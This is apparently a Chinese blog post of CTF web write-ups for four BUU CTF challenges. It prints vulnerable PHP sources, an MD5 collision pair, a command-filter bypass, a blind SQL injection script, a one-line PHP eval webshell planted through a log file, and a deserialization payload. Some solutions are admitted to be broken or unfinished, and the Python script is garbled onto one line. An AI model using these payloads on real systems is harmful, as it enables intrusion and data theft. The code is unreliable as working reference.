BUU CTF Learn 3

好嘛。上一个文章编码乱了，我也不知道为啥，再开一个吧！

[安洵杯 2019]easy_web

考点:
base64加密
正则绕过
解题:

打开后是一个黑页
在url中发现了类似于base64编码的东西
解码看看：
TXpVek5UTTFNbVUzTURabE5qYz0
MzUzNTM1MmU3MDZlNjc=
3535352e706e67
hex转str：555.png
猜测这里可以文件读取
尝试读取index.php


<?php
error_reporting(E_ALL || ~ E_NOTICE);
header('content-type:text/html;charset=utf-8');
$cmd = $_GET['cmd'];
if (!isset($_GET['img']) || !isset($_GET['cmd']))
     header('Refresh:0;url=./index.php?img=TXpVek5UTTFNbVUzTURabE5qYz0&cmd=');
$file = hex2bin(base64_decode(base64_decode($_GET['img'])));
$file = preg_replace("/[^a-zA-Z0-9.]+/", "", $file);
if (preg_match("/flag/i", $file)) {
     echo '<img src ="./ctf3.jpeg">';
     die("xixiï½ž no flag");
} else {
     $txt = base64_encode(file_get_contents($file));
     echo "<img src='data:image/gif;base64," . $txt . "'></img>";
     echo "<br>";
}
echo $cmd;
echo "<br>";
if (preg_match("/ls|bash|tac|nl|more|less|head|wget|tail|vi|cat|od|grep|sed|bzmore|bzless|pcre|paste|diff|file|echo|sh|\'|\"|\`|;|,|\*|\?|\\|\\\\|\n|\t|\r|\xA0|\{|\}|\(|\)|\&[^\d]|@|\||\\$|\[|\]|{|}|\(|\)|-|<|>/i", $cmd)) {
     echo("forbid ~");
     echo "<br>";
} else {
     if ((string)$_POST['a'] !== (string)$_POST['b'] && md5($_POST['a']) === md5($_POST['b'])) {
          echo <code class="prettyprint" >$cmd;
} else {
          echo ("md5 is funny ~");
}
}
?>

源码审计~~（我吐了~~
可以发现过滤了一吨函数
但是这里的最下面cmd可以利用来读取文件
MD5生日攻击满足判断

a=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%00%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1U%5D%83%60%FB_%07%FE%A2
&b=M%C9h%FF%0E%E3%5C%20%95r%D4w%7Br%15%87%D3o%A7%B2%1B%DCV%B7J%3D%C0x%3E%7B%95%18%AF%BF%A2%02%A8%28K%F3n%8EKU%B3_Bu%93%D8Igm%A0%D1%D5%5D%83%60%FB_%07%FE%A2

可以这里过滤了一吨函数，怎么读flag呢？
本地测试发现ca\t /flag不会被过滤
传入后源代码获得flag！

[CISCN2019 总决赛 Day2 Web1]Easyweb

考点:
解题：

打开后是登陆框，尝试各种登录报500后，扫目录得robots.txt
获得image.php.bak


<?php
include "config.php";
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";
$id=addslashes($id);
$path=addslashes($path);
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

源码审计~~（杂又审计~~
//这题好像有问题跑不出来


import  requests
url = "http://31cc2ff3-7be1-484e-b9bc-d665bf705ad6.node3.buuoj.cn/image.php?id=\\0&path="
payload = "or id=if(ascii(substr((select username from users),{0},1))>{1},1,0)%23"
result = ""
for i in range(1,100):
    l = 1
    r = 130
    mid = (l + r)>>1
    while(l<r): payloads = payload.format(i,mid) print(url+payloads) html = requests.get(url+payloads) if "JFIF" in html.text: l = mid +1 else: r = mid mid = (l + r)>>1
    result+=chr(mid)
    print(result)

这里表名是猜出来的，登录成功后上传短木马到日志文件，然后蚁剑连接获得flag

文件名：<?=@eval($_POST['a']);?>

然后就有flag

[安洵杯 2019]easy_serialize_php

考点：
反序列化
解题：

<?php
$function = @$_GET['f'];
function filter($img){
    $filter_arr = array('php','flag','php5','php4','fl1g');
    $filter = '/'.implode('|',$filter_arr).'/i';
    return preg_replace($filter,'',$img);
}
if($_SESSION){
    unset($_SESSION);
}
$_SESSION["user"] = 'guest';
$_SESSION['function'] = $function;
extract($_POST);
if(!$function){
    echo '<a href="index.php?f=highlight_file">source_code</a>';
}
if(!$_GET['img_path']){
    $_SESSION['img'] = base64_encode('guest_img.png');
}else{
    $_SESSION['img'] = sha1(base64_encode($_GET['img_path']));
}
$serialize_info = filter(serialize($_SESSION));
if($function == 'highlight_file'){
    highlight_file('index.php');
}else if($function == 'phpinfo'){
    eval('phpinfo();'); //maybe you can find something in here!
}else if($function == 'show_image'){
    $userinfo = unserialize($serialize_info);
    echo file_get_contents(base64_decode($userinfo['img']));
}

打开即源码，源码审计
提示我们phpinfo中可能有东西，我们去看看
发现flag的存放地址是 d0g3_f1ag.php
payload：_SESSION[user]=;s:14:"phpflagphpflag";s:7:"xxxxxxx";s:3:"img";s:20:"L2QwZzNfZmxsbGxsbGFn";}
这题的反序列化点还没找到、慢慢找一下

[SUCTF 2019]EasyWeb

考点
解题
又开门给源码：

<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!!
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^");
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^"); if(!exif_imagetype($tmp_name)) die("^_^"); $path= $userdir."/".$name; @move_uploaded_file($tmp_name, $path); print_r($path); } } $hhh = @$_GET['_']; if (!$hhh){ highlight_file(__FILE__); } if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}
if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');
$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");
eval($hhh);

审计吧
不会告辞

[安洵杯 2019]easy_web

[CISCN2019 总决赛 Day2 Web1]Easyweb

[安洵杯 2019]easy_serialize_php

[SUCTF 2019]EasyWeb

发表回复 取消回复

发表回复取消回复